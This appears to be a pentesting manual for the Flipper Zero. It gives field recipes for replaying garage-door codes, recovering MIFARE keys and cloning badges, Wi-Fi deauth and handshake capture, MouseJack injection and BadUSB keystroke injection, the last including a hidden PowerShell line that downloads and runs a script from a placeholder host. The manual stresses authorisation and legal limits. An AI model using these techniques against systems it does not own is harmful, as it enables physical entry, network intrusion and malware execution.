Flipper Zero · Volume 11

Flipper Zero Volume 11 — Workflows & Recipes

End-to-end field recipes — garage-door analysis, RFID badge audit, BLE keyboard pentest, NFC tag programming, SDR companion mode

Contents

Section  Topic
1        About this Volume
2        Garage-Door Audit (Sub-GHz)
  2.1    Recon
  2.2    Capture
  2.3    Replay (static codes only)
  2.4    Rolling-code reality
  2.5    Documentation
3        RFID Badge Audit (LF + HF)
  3.1    Identify the card type
  3.2    Mfkey32 / nested
  3.3    Clone to magic card / T5577
  3.4    Reporting
4        IR Universal-Remote Build for an Unfamiliar Device
5        BadUSB Keyboard Pentest
  5.1    Test on owned hardware first
  5.2    Real payload structure
  5.3    BLE BadKB (no USB cable)
  5.4    Caveat (important)
6        Wi-Fi Audit with WiFi Devboard + Marauder
  6.1    Setup
  6.2    Recon
  6.3    Active capture (deauth + handshake)
  6.4    5 GHz / Wi-Fi 6
  6.5    Legal
7        NRF24 / MouseJack
8        SDR Companion Mode (HackRF / RTL-SDR + Flipper)
  8.1    The pattern
  8.2    Specific recipes (cross-reference uConsole and HackRF subprojects)
9        NFC Tag Programming (NTAG)
10       iButton Read + Clone
11       qFlipper + Mobile App Workflow
12       Multi-Tool Synthesis: A Realistic Field Day
13       Common Workflow Pitfalls
14       What’s next

1. About this Volume

The previous volumes covered subsystems in isolation. This volume combines them into complete field workflows — start to finish, with the firmware, the modules, and the companion tools (HackRF, RTL-SDR, phone, Kali laptop, Bus Pirate when relevant) all in their right places.

Each recipe assumes:

  • tjscientist’s loadout (multiple Flippers, official WiFi Devboard + Marauder, VGM, NRF24, external CC1101 amp, Game Over, AWOK V3).
  • Momentum mainline as primary firmware.
  • Lab discipline: own the equipment or have written authorization.

2. Garage-Door Audit (Sub-GHz)

Use case: assess whether a garage door / gate uses static codes (insecure) or rolling codes (modern), and clone if static.

2.1 Recon

1. Stand 1 m from the receiver.
2. Sub-GHz → Frequency Analyzer.
3. Press the OEM remote. Note the strongest frequency.
   - 300-315 MHz → US-market (most pre-2010)
   - 433.92 MHz → EU + worldwide modern
   - 868 MHz → European modern
4. If RSSI < -60 dBm, move closer.

2.2 Capture

5. Sub-GHz → Read.
6. Press the OEM remote at the captured frequency.
7. Read what the parser says:
   - "Princeton" / "CAME" / "NICE FLO" / "Linear MegaCode" / "Holtek HT12" →
     STATIC code. Clone via Save → Send.
   - "KeeLoq" / "Hörmann (BiSecur)" / "BFT Mitto" / "FAAC SLH" →
     ROLLING code. The decoded value is good for ONE transmission.
   - "RAW" parse → fall through. Try Read RAW.

2.3 Replay (static codes only)

8. Save → name (MyGarage).
9. Sub-GHz → Saved → MyGarage → Send.
   The Flipper transmits the captured code. Door opens.
   Range: 5-10 m onboard, 70-150 m with external CC1101 amp.

2.4 Rolling-code reality

Modern garage openers (post-2014, most LiftMaster, Genie, Hörmann, Nice, etc.) use rolling codes that the Flipper can capture and decode but cannot meaningfully replay. The receiver expects the next sequence; replaying a captured one is rejected.

Some attacks against specific rolling-code implementations exist (e.g., RollJam against certain pre-2018 systems), but they require either a second device (a jammer + capture rig) or specific implementation weaknesses — out of scope for casual Flipper use, and on owned doors only.

2.5 Documentation

For an audit deliverable, capture:

  • Frequency
  • Modulation (OOK / FSK)
  • Protocol (parser output)
  • Code length (bits)
  • Whether static or rolling
  • Replay-success/fail

The captured .sub file pulled to a PC has all this in plaintext.
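As an added example (not from this volume), a small Python script that pulls those six audit fields out of a .sub file so the deliverable can be generated from the capture itself. The protocol names are the parser labels from 2.2 matched case-insensitively, modulation is inferred from the Preset name, and the sample file is constructed rather than a real recording.

```python
import re

# Parser names from section 2.2, matched case-insensitively as substrings
# of the Protocol: field (the Flipper writes RAW for unparsed bursts).
STATIC_HINTS = ("princeton", "came", "nice flo", "linear", "holtek")
ROLLING_HINTS = ("keeloq", "hormann", "hörmann", "bft", "faac")

def parse_sub(text):
    """Return the 'Key: Value' header fields of a .sub file as a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z_ ]+):\s*(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields

def audit_sub(text):
    """Reduce one capture to the six audit fields listed in 2.5."""
    f = parse_sub(text)
    proto = f.get("Protocol", "")
    p = proto.lower()
    if p == "raw":
        kind = "raw"          # no parser match; fall back to Read RAW
    elif any(h in p for h in ROLLING_HINTS):
        kind = "rolling"      # decoded value is good for one transmission
    elif any(h in p for h in STATIC_HINTS):
        kind = "static"
    else:
        kind = "unknown"
    preset = f.get("Preset", "")   # e.g. FuriHalSubGhzPresetOok650Async
    mod = "OOK" if "Ook" in preset else "FSK" if "FSK" in preset else "custom/unknown"
    freq, bits = f.get("Frequency", ""), f.get("Bit", "")
    return {
        "frequency_mhz": int(freq) / 1e6 if freq.isdigit() else None,
        "modulation": mod,
        "protocol": proto,
        "bits": int(bits) if bits.isdigit() else None,
        "code_type": kind,
        "replay_viable": kind == "static",   # replay success only plausible here
    }

# Constructed sample captures (not real recordings); key bytes are made up.
SAMPLE_STATIC = """Filetype: Flipper SubGhz Key File
Frequency: 433920000
Preset: FuriHalSubGhzPresetOok650Async
Protocol: Princeton
Bit: 24
Key: 00 00 00 00 00 5A C3 E1
"""
SAMPLE_ROLLING = SAMPLE_STATIC.replace("Princeton", "KeeLoq").replace("Bit: 24", "Bit: 64")
```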

3. RFID Badge Audit (LF + HF)

Use case: assess what type of access cards a facility uses, attempt clone + replay on owned cards.

3.1 Identify the card type

A single physical reader may handle both LF and HF cards. Try LF first (more common in older systems):

1. RFID → Read → press card to side of Flipper.
   If parsed → EM4100 / HID Prox / Indala / etc. Note format.
   If no parse → not LF, or LF but unknown format. Try HF.

2. NFC → Read → press card to back of Flipper.
   If parsed → MIFARE Classic 1k/4k / NTAG / DESFire / etc.
   If parse fails partway → MIFARE Classic with non-default keys.
   Run the Mfkey32 / nested workflow.

3.2 Mfkey32 / nested

For MIFARE Classic with unknown sector keys:

1. NFC → Read → save what's readable as <name>.nfc.
2. NFC → Saved → <name> → Detect Reader.
   The Flipper now emulates the partial card to a real reader.
3. Wave the Flipper at the reader. Each auth attempt is captured.
4. After 10-30 captures, NFC → Saved → <name> → Mfkey32:
   the keys recovered get appended to <name>.nfc.
5. Re-read the card; previously-locked sectors now decrypt.

For nested attack against cards where one key is known:

1. Confirm one sector key known (often the default A0A1A2A3A4A5
   factory key on sector 0).
2. NFC → Saved → <name> → Nested.
3. Other sector keys are recovered in seconds.

3.3 Clone to magic card / T5577

LF (125 kHz):
  RFID → Saved → <name> → Write
  Press a blank T5577 card → wait 1-2 sec → cloned.

HF (13.56 MHz):
  NFC → Saved → <name> → Write (Magic)
  Press a magic card (Gen 1A / 1B / 2 / 3 / 4) → cloned.

3.4 Reporting

For an audit report:

  • Card type (e.g., “MIFARE Classic 1k, 16 sectors, 5 sectors using factory key A0A1A2A3A4A5, 11 sectors using custom keys”)
  • Clone success/failure
  • Recommendation: “Cards are vulnerable to mfkey32. Migrate to DESFire EV2 or higher.”
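Added example (not part of this volume): a Python audit of a Flipper MIFARE Classic .nfc dump that classifies each sector trailer as default-key, custom-key or still-unknown and produces the report line above. It assumes the Flipper dump layout (`Block N:` lines, `??` for unrecovered bytes, keys in the last block of each sector) and treats A0A1A2A3A4A5 and FFFFFFFFFFFF as the well-known default keys; the dump is constructed.

```python
import re

# Well-known default keys: the MAD key the recipe names plus the transport key.
DEFAULT_KEYS = {"A0A1A2A3A4A5", "FFFFFFFFFFFF"}
SECTOR_COUNT = {"1K": 16, "4K": 40, "Mini": 5}

def trailer_block(sector):
    # Sectors 0-31 have 4 blocks; sectors 32-39 (4K only) have 16. Keys live in the trailer.
    return sector * 4 + 3 if sector < 32 else 128 + (sector - 32) * 16 + 15

def audit_nfc(text):
    """Classify every sector of a Flipper MIFARE Classic dump by its keys."""
    fields, blocks = {}, {}
    for line in text.splitlines():
        mb = re.match(r"^Block (\d+):\s*(.*)$", line)
        mf = re.match(r"^([A-Za-z ]+):\s*(.*)$", line)
        if mb:
            blocks[int(mb.group(1))] = mb.group(2).split()   # 16 hex bytes or ??
        elif mf:
            fields[mf.group(1)] = mf.group(2)
    ctype = fields.get("Mifare Classic type", "1K")
    result = {"type": ctype, "factory": [], "custom": [], "unknown": []}
    for s in range(SECTOR_COUNT.get(ctype, 16)):
        trailer = blocks.get(trailer_block(s), ["??"] * 16)
        key_a, key_b = "".join(trailer[0:6]), "".join(trailer[10:16])
        known = [k.upper() for k in (key_a, key_b) if "?" not in k]
        if not known:
            result["unknown"].append(s)       # Mfkey32/nested never recovered it
        elif any(k in DEFAULT_KEYS for k in known):
            result["factory"].append(s)       # weakest link: one default key suffices
        else:
            result["custom"].append(s)
    return result

def summary(r):
    return (f"MIFARE Classic {r['type']}, {SECTOR_COUNT.get(r['type'], 16)} sectors, "
            f"{len(r['factory'])} using a default key, {len(r['custom'])} using "
            f"custom keys, {len(r['unknown'])} with no key recovered")

# Constructed 1K dump: sectors 0-4 keep the MAD key, sector 15 never opened,
# the rest use a made-up custom key. FF 07 80 69 are stock access bits.
SAMPLE_NFC = "\n".join(
    ["Filetype: Flipper NFC device", "Mifare Classic type: 1K"]
    + [f"Block {trailer_block(s)}: {ka} FF 07 80 69 {kb}"
       for s in range(16)
       for ka, kb in [("A0 A1 A2 A3 A4 A5", "FF FF FF FF FF FF") if s < 5
                      else ("?? ?? ?? ?? ?? ??", "?? ?? ?? ?? ?? ??") if s == 15
                      else ("1A 2B 3C 4D 5E 6F", "6F 5E 4D 3C 2B 1A")]])
```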

4. IR Universal-Remote Build for an Unfamiliar Device

Use case: lost the OEM remote for a 12-year-old projector; need to control it from the Flipper.

1. Find any working remote: phone IR app, original remote, vendor
   support.
2. Infrared → Learn New Remote → start with empty file.
3. For each button:
   - Add Button → press original remote at the Flipper's IR receiver.
   - Wait for parse (NEC / Sony SIRC / RC5 / RC6 / Kaseikyo / Samsung).
   - If raw, accept the raw timings.
   - Name the button (Power, VolumeUp, ChannelDown, INPUT, MENU, OK,
     UP, DOWN, LEFT, RIGHT, BACK).
4. Save as /ext/infrared/Projector.ir.
5. Open with XRemote FAP for grid layout.
6. Push to phone via Mobile App if you want both interchangeable.

A complete remote is typically 12–20 buttons captured. Most TV / projector / AV-receiver remotes use NEC at 38 kHz, so even raw fallback usually works.

For 30+ ft range, attach the Rabbit-Labs IR Blaster (Vol 9 §3.2) and configure External GPIO routing per Vol 6 §2.7.

5. BadUSB Keyboard Pentest

Use case: deliver a payload via the Flipper as a USB keyboard.

5.1 Test on owned hardware first

1. /ext/badusb/test.txt (REM is the DuckyScript comment keyword):
     REM Win+R opens the Run dialog, then type into Notepad
     DELAY 2000
     GUI r
     DELAY 500
     STRING notepad
     ENTER
     DELAY 1000
     STRINGLN BadUSB self-test
2. Plug into your own laptop, run.
3. Verify the layout is right (US default; for non-US keyboard, swap
   in BadUSB → Settings → Layout).

5.2 Real payload structure

Typical attack pattern (against owned hardware!):

DELAY 5000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "$u='http://example.invalid/p.ps1';iex(irm $u)"
ENTER

Realistic latencies: use a 5-second initial DELAY (gives slow machines time to enumerate the new HID device) and 500 ms inter-keypress delays on unreliable targets.

5.3 BLE BadKB (no USB cable)

If physical insertion is impossible:

1. Momentum: BadUSB → Settings → Connection → BLE.
2. Pair the Flipper as a BLE keyboard to the target machine
   (target needs to be in pairing mode).
3. Run the script over BLE.

Slower than USB (each character is sent as its own BLE keyboard report, roughly 10 ms each) but needs no cable.

5.4 Caveat (important)

Stock OFW Flipper BadUSB enumerates with USB VID identifying it as Flipper Zero. Endpoint inspection on a target reveals the device name. For stealth scenarios where the target machine has device-ID allowlisting, the Flipper is identifiable; a Hak5 Rubber Ducky (which identifies as a generic USB HID) would not be.

Custom firmwares can spoof descriptors, but this changes the legal calculus — masquerading as another device is a different liability than “bring an obvious tool”.

6. Wi-Fi Audit with WiFi Devboard + Marauder

Use case: enumerate Wi-Fi APs, capture handshakes for offline cracking.

6.1 Setup

1. WiFi Devboard plugged in via USB-C side.
2. Apps → GPIO → WiFi Marauder. Wait for UART connection ("Marauder vX.Y").
3. Optional: configure target AP allowlist via "Set Target".

6.2 Recon

4. "Sniff Beacon" — runs a beacon-probe scan, dumps APs with SSID, BSSID,
   channel, RSSI, encryption.
5. "Sniff Probe" — dumps client probe requests; identifies clients
   roaming for known SSIDs (potential evil-portal targets).
6. "Sniff Pwned" — passive WPA handshake capture as clients connect.

6.3 Active capture (deauth + handshake)

7. "Attack" → "Deauth" → pick AP → start.
   Clients drop, reconnect, EAPOL handshake captured.
8. Pull the handshake .pcap from the Devboard's microSD (or from the
   Flipper's SD if Marauder writes it there).

Where to break the handshake: not on the Flipper. Pull the .pcap to a real machine, run hashcat or aircrack-ng against a wordlist. The Flipper’s M4 doesn’t have the cycles.

6.4 5 GHz / Wi-Fi 6

WiFi Devboard is 2.4 GHz only. For 5 GHz, swap to Apex 5 (Vol 9 §2.4).

6.5 Legal

Deauth = FCC Part 15 violation in the US (jamming). Sustained TX of deauth frames is enforcement-grade illegal. Lab use into a Faraday cage / RF-shielded room only. See _shared/legal_ethics.md.

7. NRF24 / MouseJack

Use case: identify a vulnerable wireless keyboard/mouse and inject keystrokes.

1. NRF24 module plugged in (Vol 8 §4.3 pinout).
2. Apps → GPIO → Mousejacker. Pick "Sniff" → walk around the target
   environment.
   Sniffer reports BSSID, channel, vendor signature (Logitech Unifying,
   Microsoft 2.4G, etc.).
3. If a vulnerable device is detected, "Attack" → pick injection
   payload (a Ducky-script-like sequence).
4. Stand near the receiver dongle (~5-10 m on bare NRF24, 100m+ with
   PA+LNA module). Send.
5. Keystrokes appear as if from the legitimate keyboard.

Affected devices include older Logitech Unifying receivers (pre-2016 firmware), various clone keyboards, and some industrial wireless HID. Modern (2018+) Logitech firmware patched this.

8. SDR Companion Mode (HackRF / RTL-SDR + Flipper)

Use case: you need a capability the Flipper lacks (wideband spectrum analysis, IQ recording, modulation reverse-engineering), but the field tool in your pocket is the Flipper.

8.1 The pattern

The Flipper is the field instrument: pocketable, on-device UI, captures one channel at a time on a known protocol. The HackRF or RTL-SDR is the lab tool: connected to a computer, sees the entire band, records IQ for offline analysis.

Workflow:

1. With the Flipper:
   - Frequency Analyzer to find the carrier.
   - Read RAW to capture timings.
2. Observe that the capture doesn't match any known parser.
3. Pull out the RTL-SDR + laptop:
   - Run GQRX or SDR++ at the captured frequency.
   - Watch the spectrum to identify the modulation visually.
   - Record IQ samples.
4. Open IQ in URH (Universal Radio Hacker):
   - Demodulate, identify symbol rate.
   - Identify the framing.
   - Reconstruct the protocol structure.
5. Back to the Flipper:
   - Write a custom parser (FAP) that handles this new protocol, or
   - Find the right preset (CC1101 register set) to tune to the signal.

This is exactly the use case _shared/comparison.md outlines: Flipper for known protocols in the field, HackRF/RTL-SDR for unknown protocols in the lab.

8.2 Specific recipes (cross-reference uConsole and HackRF subprojects)

For HackRF + GNU Radio: see ../HackRF One/03-outputs/ for workflows when those volumes are populated.

For deeper SDR work on the uConsole as a portable Linux box: see ../Clockwork uConsole/03-outputs/uConsole_Vol09_RF_SDR_Workflows.docx.

9. NFC Tag Programming (NTAG)

Use case: program NDEF data onto NFC tags for things like business cards, smart-home triggers, and Amiibo equivalents.

1. NFC → Read → press blank NTAG (typically NTAG 215 for Amiibo;
   NTAG 213 for short URLs).
2. Save as Template.nfc.
3. Pull off the Flipper, edit /ext/nfc/Template.nfc on a PC. Specifically
   the NDEF data section.
4. Push back to the Flipper.
5. NFC → Saved → Template → Write → press blank tag.
6. Verify with phone NFC scanner — tag should fire the URL or trigger.
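Added example (not from this volume): Python that builds the NDEF URI record and TLV wrapper for step 3 and emits `Page N:` lines for the NTAG user area, so the Template.nfc edit is generated rather than hand-typed. The page layout (user memory from page 4, 4 bytes per page) and the user-memory sizes follow the NTAG21x datasheets; the URL is a constructed sample.

```python
# NFC Forum URI RTD abbreviation codes; longer prefixes must be tried first.
URI_PREFIXES = ((0x02, "https://www."), (0x01, "http://www."),
                (0x04, "https://"), (0x03, "http://"),
                (0x05, "tel:"), (0x06, "mailto:"))

# Usable NDEF bytes from page 4 onward (NTAG21x datasheets).
USER_BYTES = {"NTAG213": 144, "NTAG215": 504, "NTAG216": 888}

def ndef_uri_record(uri):
    """Single short NDEF record of well-known type 'U' carrying the URI."""
    code, rest = 0x00, uri
    for c, prefix in URI_PREFIXES:
        if uri.startswith(prefix):
            code, rest = c, uri[len(prefix):]
            break
    payload = bytes([code]) + rest.encode("utf-8")
    if len(payload) > 255:
        raise ValueError("URI too long for the short-record form")
    # 0xD1 = MB|ME|SR set, TNF=1 (well-known); type length 1; type 'U'
    return bytes([0xD1, 0x01, len(payload), 0x55]) + payload

def ndef_tlv(message):
    """Wrap an NDEF message in the Type 2 Tag NDEF TLV plus terminator TLV."""
    if len(message) < 0xFF:
        length = bytes([len(message)])
    else:
        length = b"\xff" + len(message).to_bytes(2, "big")
    return b"\x03" + length + message + b"\xfe"

def ntag_pages(uri, tag="NTAG213"):
    """'Page N: xx xx xx xx' lines for the user area of a Template.nfc."""
    data = ndef_tlv(ndef_uri_record(uri))
    if len(data) > USER_BYTES[tag]:
        raise ValueError(f"{len(data)} bytes exceeds {tag} user memory")
    data += b"\x00" * (-len(data) % 4)          # pad to a whole 4-byte page
    return [f"Page {4 + i // 4}: " + " ".join(f"{b:02X}" for b in data[i:i + 4])
            for i in range(0, len(data), 4)]

if __name__ == "__main__":
    # Constructed sample URL; paste the output over the Page 4+ lines.
    print("\n".join(ntag_pages("https://example.com")))
```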

For Amiibo specifically: pull a .nfc of an existing Amiibo (Amiibo dump files are widely shared online, though legality varies; check your jurisdiction) and write it to a fresh NTAG 215. Note that modern Switch firmware has implemented anti-clone checks against some Amiibo, so a freshly cloned NTAG 215 may be rejected by current games.

10. iButton Read + Clone

Quick recipe for completeness:

1. iButton → Read → touch the iButton key against the side pad.
2. Save as MyKey.ibtn.
3. iButton → Saved → MyKey → Emulate → touch the Flipper side pad to
   the reader pad.

For permanent clones, write to a blank DS1990A iButton via an iButton writer FAP (separate from this workflow).

11. qFlipper + Mobile App Workflow

The optimal “reach for the Flipper from any computer” pattern:

On phone (Flipper Mobile App, Android first-class, iOS limited):
  - Browse Flipper SD via BLE
  - Push files (IR remotes, captures) between phone and Flipper
  - Trigger Read / Emulate from phone
  - Crowdsourced IR remotes library

On laptop (qFlipper / Web Updater at lab.flipper.net):
  - Firmware management (install, repair, recovery)
  - Direct file copy at USB speed (much faster than BLE)
  - Live console / serial CLI
  - Bulk file management

For multiple Flippers, qFlipper handles them one at a time: open a separate qFlipper instance per device, and use the device serial number to tell which instance is talking to which Flipper.

12. Multi-Tool Synthesis: A Realistic Field Day

A realistic field day for tjscientist (multi-tool):

Pelican case opens. Inventory:
  - Flipper Zero #1 (VGM stack, primary)
  - Flipper Zero #2 (Game Over stack, multi-radio)
  - WiFi Devboard (Marauder)
  - External CC1101 amp + tuned 433/868 MHz antenna
  - HackRF One + dipole + 1090 collinear (when bought)
  - Clockwork uConsole (Kali, full toolchain)

Job: Audit a small office.

  1. Walk in with Flipper #1 (default Momentum). Open Sub-GHz Frequency
     Analyzer. Walk room — note any sub-GHz transmitters.
  2. Switch to Flipper #2 with Game Over. Open Marauder via Flipper.
     "Sniff Beacon" — capture every 2.4 GHz AP in the building.
  3. Note BSSID/SSID/channel/encryption, save .pcap.
  4. RFID/NFC near the badge reader. Capture badge type with Flipper #1.
  5. (If authorized) clone target badge to magic card, verify access.
  6. Pull out HackRF + uConsole. Park outside. Run gqrx wideband
     across 800-1100 MHz to sniff cellular/IoT traffic.
  7. Back at the lab: import .pcap into Wireshark, .sub files into
     URH, RFID dump into mfkey32. Document in a report.

The Flipper handles the on-device, in-the-moment captures. The HackRF + uConsole handles the wideband + decode. Both are in the same Pelican case — they’re complementary, not competing.

13. Common Workflow Pitfalls

Pitfall | Symptom | Fix
Trying to replay a rolling code | Door doesn’t open | Identify rolling-code; abandon replay; consider out-of-band approach
Capturing too far from a sub-GHz emitter | Weak / partial decode | Move within 1 m; or use external amp + tuned antenna
BadUSB script not typing | Layout mismatch | BadUSB → Settings → Layout = match target keyboard
Marauder can’t see APs | Wi-Fi device not in monitor mode | Confirm Marauder is running on the Devboard; Flipper just reports
Mfkey32 captures nothing | Reader uses random nonce + already-fetched key | mfkey32 is reader-dependent; try a different reader if available
NFC tag clones write but reader rejects | Reader checks UID type / anti-collision | Try a magic card of different generation (Gen 1A/1B/2/3/4)
GPS module never gets a fix | Antenna shielded; ceramic patch in pocket | Move to clear sky; consider external active antenna

14. What’s next

Vol 12 — Cheatsheet. The print/laminate one-pager set — GPIO pinout, sub-GHz protocols, NFC card types, BadUSB DuckyScript, JS API, BLE re-pair, DFU recovery, firmware-switch SD layout. Carry it.